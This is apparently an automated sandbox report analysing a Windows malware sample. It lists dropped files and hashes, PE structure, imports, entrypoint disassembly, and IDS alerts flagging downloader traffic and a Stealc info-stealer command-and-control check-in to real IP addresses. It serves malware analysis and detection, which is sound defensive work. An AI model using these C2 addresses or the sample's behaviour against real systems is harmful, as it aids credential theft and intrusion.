                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_A8A9.tmp.exe_3d5dfce8cbb349ab566cb0d21cc9f0676852a9d_1a91c480_0c8ad302-763a-4e17-a97b-0dc6c15c2859\Report.wer

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.9640681542158469
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:WEZndtb0qfEPjMhZrMZtzuiFkZ24IO89:BZdtoqfEPjjTzuiFkY4IO89
                                                                                  MD5:B781BE33E1F305DA76FEFC8AB36A6E33
                                                                                  SHA1:F7F9FC6BB2E3D64068015806D7BD340FD378FC12
                                                                                  SHA-256:5A5204B3D3C48C3713861743BAAAC4BB0EEB8A6E48FFC1184B89652EAB708EA8
                                                                                  SHA-512:FB9F940FDCA8AA3AC1F6932CB1FC9669B6282F7695646A501480D66D4CFC45EE9B9D9ECF2729DDF81415BA1D0303C6DD46343EA36F6618F540FBD1024C35D239
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.5.5.0.8.1.7.0.5.5.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.5.5.0.9.4.5.1.8.0.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.8.a.d.3.0.2.-.7.6.3.a.-.4.e.1.7.-.a.9.7.b.-.0.d.c.6.c.1.5.c.2.8.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.b.6.7.7.9.1.-.6.f.a.d.-.4.3.8.f.-.b.f.b.e.-.f.d.e.9.5.9.f.e.3.7.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.8.A.9...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.c.-.0.0.0.1.-.0.0.1.4.-.7.a.3.0.-.9.8.4.2.c.8.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.5.3.1.a.9.a.5.c.5.b.8.9.0.c.e.4.4.5.e.b.8.c.0.1.8.2.1.f.5.4.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.7.6.2.c.6.9.c.5.d.8.4.e.5.6.f.b.3.8.6.f.a.c.5.6.0.1.5.d.3.f.5.8.3.5.1.f.9.b.!.A.8.A.9...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAACC.tmp.dmp

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 16:58:28 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):60614
                                                                                  Entropy (8bit):1.9244435090311371
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:bO3ZdXsTPAlCZXRgMbOEOJwpBBeQV3RXO05qvF99sIsfVacvHHozGNtQDHZXb31I:K3ZqPgTEE+BB9JpOwUF9cHIKcdRvFq
                                                                                  MD5:208F86C38E86EECB5988AF173A5268DD
                                                                                  SHA1:F1C51C18DCE884FEF59D47F99B485CD8A8178DA2
                                                                                  SHA-256:588EF0F73BA532AC73B34284AE78F9528C5E8F191B87E960BDA75C251E95601E
                                                                                  SHA-512:4C182DEA5AACD741C339D4713DE8433C9249A215A4835F526B7FFD0AD9AA2B417B8A14C95A06A63E33523717A34FECDC86130E6A96BC13600471D9D9B709895F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ..........g............4...............<............*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE58.tmp.WERInternalMetadata.xml

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8312
                                                                                  Entropy (8bit):3.6975553628280697
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJhWV6bRg6YjR6HyNgmfxqpDT89bCfsf8Wm:R6lXJy6bRg6Y16YgmfxDCEfE
                                                                                  MD5:68FB84AC417ACC2AFFACE4C38241A8CB
                                                                                  SHA1:BFF63D07E7BD448BBEEA561B561469714D940D30
                                                                                  SHA-256:4E93442A9C9DDCDF239DB36141BEB4F0774BBD37B178A095285E04DDA63324DB
                                                                                  SHA-512:7CC0673C73F3B375EAA88A9317340BDD0ED1F2C5ED4FFD672844451219DF83E8A40901709F04C54D2BC9DA3B78AFC3484182B03C42A4618D281B92871641F66C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.4.<./.P.i.

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEB6.tmp.xml

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4565
                                                                                  Entropy (8bit):4.4414685388279995
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsEJg77aI9M/WpW8VYiYm8M4J966FsX+q8CGvV5q7BUEd:uIjfCI7Ou7VKJcjXivV5q7BUEd
                                                                                  MD5:2AE577C2BAFACE5C9307EA4511D09601
                                                                                  SHA1:B7DD71AB15AFA077A160A53D21F73B24450F1922
                                                                                  SHA-256:001F19C1A516ED2B5177AF9DD939451CA17D77BC8C693B97C51D0308903FD300
                                                                                  SHA-512:D1A8C7371502BAA9B62B6A601A5FADB502F52573883E03532930022C991FF5F591DD44951D820A8B8AC47E3C1FC5361321EABEECEEACC8D4500D2A9E31D3C7E0
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560641" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):402432
                                                                                  Entropy (8bit):6.6214870089703375
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:aLoOrrA59Zbm4mbZJSeWnFcmw4iD8VYwmAgFl7gVWbfonBeao:a5r2Dbm4mbJWnFoYVrVWbfy
                                                                                  MD5:085DE763171FBBAFEAC2CDB972AACC2A
                                                                                  SHA1:E4762C69C5D84E56FB386FAC56015D3F58351F9B
                                                                                  SHA-256:DD4A5EFC48BBD0ED6AD6AAB7220CAB9F5BF0FF1FD47F5594BA67AE122CBF026F
                                                                                  SHA-512:9DE251FEDE114A679632377677751F7427C03865AABF2A6733AC22B9AE03E76645DA2BD626C55345ACDFE5CAF704A2DBA475B1B7FF911AFD38061CD13CA344AC
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................j............................&..................................Rich............................PE..L...>..e......................r...................@..........................pv......T..........................................<....`t.p............................................................................................................text...L........................... ..`.rdata...%.......&..................@..@.data...x.p.........................@....weririt.D....t..8..................@....rsrc...p....`t.....................@..@................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):402432
                                                                                  Entropy (8bit):6.6214870089703375
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:aLoOrrA59Zbm4mbZJSeWnFcmw4iD8VYwmAgFl7gVWbfonBeao:a5r2Dbm4mbJWnFoYVrVWbfy
                                                                                  MD5:085DE763171FBBAFEAC2CDB972AACC2A
                                                                                  SHA1:E4762C69C5D84E56FB386FAC56015D3F58351F9B
                                                                                  SHA-256:DD4A5EFC48BBD0ED6AD6AAB7220CAB9F5BF0FF1FD47F5594BA67AE122CBF026F
                                                                                  SHA-512:9DE251FEDE114A679632377677751F7427C03865AABF2A6733AC22B9AE03E76645DA2BD626C55345ACDFE5CAF704A2DBA475B1B7FF911AFD38061CD13CA344AC
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................j............................&..................................Rich............................PE..L...>..e......................r...................@..........................pv......T..........................................<....`t.p............................................................................................................text...L........................... ..`.rdata...%.......&..................@..@.data...x.p.........................@....weririt.D....t..8..................@....rsrc...p....`t.....................@..@................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.465447894538723
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN0dwBCswSbq:NXD94+WlLZMM6YFHi+q
                                                                                  MD5:521891CC9B784FBA49912302390F94F3
                                                                                  SHA1:2F4FC17694FE2507775D293E49323EE9C38341CD
                                                                                  SHA-256:CFB1D2C0BC80F06329CB79703B1BC49067712253F551A8A030845E8FD808AF52
                                                                                  SHA-512:9537FB0E2983F65B120FAD74A9E67B472DDAA56F4E39FE916CE2081977963CEF75DD4E609A2F8F5FFD7507DF28F54B0C8B251EB525B24F62346333084AFA928D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv99G.'.................................................................................................................................................................................................................................................................................................................................................s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.000711579734672
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                  • InstallShield setup (43055/19) 0.43%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:jicQJ2cdlM.exe
                                                                                  File size:480'256 bytes
                                                                                  MD5:c26c0c92ef5ad707c6f9dd37b2c016ae
                                                                                  SHA1:7269e1394aeb4bb014babee479e7a520a7bfe6d0
                                                                                  SHA256:9cebd9110296bdd93cb0d23ed1a591d097a49f3827b364daf44615885dbdcff7
                                                                                  SHA512:7d45dd2ad5ee7d0bd397dba4f1dbf26115a310e075749779346151881cbfbb23e6044e97eaeddcb88a55e3ee9df96753bd1a8ae857d013d6c2f96c19e63c523c
                                                                                  SSDEEP:6144:UZev6raGHzfg5cJswyMjOobVccxyeGGmFCbUXJarRr7SQrh2onv1qK2o:Dr+zfrssOobVccMZUPrRfSUAe1
                                                                                  TLSH:C5A4AE2261F16817EAB76B315D3BC6ECE66BBC62DE3D515D62107E4F09733B08922312
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...1..d...

                                                                                  File Icon

                                                                                  Icon Hash:46c7c30b0f4e0d19

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4016ea
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x64CBC631 [Thu Aug 3 15:22:25 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:52fddc1eda435b57eceba5ccd18749d5

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007F809C524568h
                                                                                  jmp 00007F809C520EFDh
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000328h
                                                                                  mov dword ptr [00453778h], eax
                                                                                  mov dword ptr [00453774h], ecx
                                                                                  mov dword ptr [00453770h], edx
                                                                                  mov dword ptr [0045376Ch], ebx
                                                                                  mov dword ptr [00453768h], esi
                                                                                  mov dword ptr [00453764h], edi
                                                                                  mov word ptr [00453790h], ss
                                                                                  mov word ptr [00453784h], cs
                                                                                  mov word ptr [00453760h], ds
                                                                                  mov word ptr [0045375Ch], es
                                                                                  mov word ptr [00453758h], fs
                                                                                  mov word ptr [00453754h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [00453788h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [0045377Ch], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [00453780h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [0045378Ch], eax
                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                  mov dword ptr [004536C8h], 00010001h
                                                                                  mov eax, dword ptr [00453780h]
                                                                                  mov dword ptr [0045367Ch], eax
                                                                                  mov dword ptr [00453670h], C0000409h
                                                                                  mov dword ptr [00453674h], 00000001h
                                                                                  mov eax, dword ptr [00452004h]
                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                  mov eax, dword ptr [00452008h]
                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                  call dword ptr [000000F0h]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [C++] VS2008 build 21022
                                                                                  • [ASM] VS2008 build 21022
                                                                                  • [ C ] VS2008 build 21022
                                                                                  • [IMP] VS2005 build 50727
                                                                                  • [RES] VS2008 build 21022
                                                                                  • [LNK] VS2008 build 21022

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x50bec0x3c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1320000x204f8.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x507880x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x1b4.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x4d66c0x4d8007e1a620d1d022cb9028744943ec60047False0.8659022177419354data7.652676977218571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x4f0000x25d00x2600d9c273b72708b7cab8a887821a7ce2b6False0.38394325657894735data5.518935144590462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x520000xdf9780x4c000c0fe7b84e10174199728dd015160aa0False0.08588610197368421data0.9993086920896931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x1320000x204f80x206009f1dc738eeec05f5a9c125a89a0d879bFalse0.4799333373552124data5.410863104938252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_CURSOR0x14a5e80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                  RT_CURSOR0x14a7180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                  RT_ICON0x132ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                                                                  RT_ICON0x1339680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                                                                  RT_ICON0x1342100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                                                                  RT_ICON0x1348d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                                                                  RT_ICON0x134e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                                                                  RT_ICON0x1373e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                                                                  RT_ICON0x1384900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                                                                  RT_ICON0x138e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                                                                  RT_ICON0x1392f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                                                                  RT_ICON0x13a1a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                                                                  RT_ICON0x13aa480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                                                                  RT_ICON0x13b1100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                                                                  RT_ICON0x13b6780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                                                                  RT_ICON0x13dc200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                                                                  RT_ICON0x13ecc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                                                                  RT_ICON0x13f6500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                                                                  RT_ICON0x13fb300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                                                                  RT_ICON0x1409d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                                                                  RT_ICON0x1412800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                                                                  RT_ICON0x1419480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                                                                  RT_ICON0x141eb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                                                                  RT_ICON0x142f580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                                                                  RT_ICON0x1438e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                                                                  RT_ICON0x143db00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8224946695095949
                                                                                  RT_ICON0x144c580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.8664259927797834
                                                                                  RT_ICON0x1455000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.8058755760368663
                                                                                  RT_ICON0x145bc80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7969653179190751
                                                                                  RT_ICON0x1461300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.804149377593361
                                                                                  RT_ICON0x1486d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.8327861163227017
                                                                                  RT_ICON0x1497800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.8426229508196721
                                                                                  RT_ICON0x14a1080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8537234042553191
                                                                                  RT_STRING0x14ce980x9adata0.6038961038961039
                                                                                  RT_STRING0x14cf380x6dadata0.4264538198403649
                                                                                  RT_STRING0x14d6180x4aadata0.4455611390284757
                                                                                  RT_STRING0x14dac80x4dcdata0.4429260450160772
                                                                                  RT_STRING0x14dfa80x7d4data0.41966067864271456
                                                                                  RT_STRING0x14e7800x718data0.42841409691629956
                                                                                  RT_STRING0x14ee980x696data0.4359430604982206
                                                                                  RT_STRING0x14f5300x616data0.43902439024390244
                                                                                  RT_STRING0x14fb480x7dedata0.41807348560079444
                                                                                  RT_STRING0x1503280x5c6data0.4370771312584574
                                                                                  RT_STRING0x1508f00x5d8data0.44385026737967914
                                                                                  RT_STRING0x150ec80x588data0.4392655367231638
                                                                                  RT_STRING0x1514500x616data0.43838254172015406
                                                                                  RT_STRING0x151a680x4eedata0.4548335974643423
                                                                                  RT_STRING0x151f580x5a0data0.4354166666666667
                                                                                  RT_GROUP_CURSOR0x14ccc00x22data1.0588235294117647
                                                                                  RT_GROUP_ICON0x14a5700x76dataTurkishTurkey0.6694915254237288
                                                                                  RT_GROUP_ICON0x1392800x76dataTurkishTurkey0.6610169491525424
                                                                                  RT_GROUP_ICON0x143d480x68dataTurkishTurkey0.7211538461538461
                                                                                  RT_GROUP_ICON0x13fab80x76dataTurkishTurkey0.6694915254237288
                                                                                  RT_VERSION0x14cce80x1b0data0.5856481481481481

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                                                                  WINHTTP.dllWinHttpOpenRequest

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  TurkishTurkey

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-26T18:58:18.093755+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730104.21.56.70443TCP
                                                                                  2024-10-26T18:58:19.631888+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.3780TCP
                                                                                  2024-10-26T18:58:28.019793+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973262.204.41.17780TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
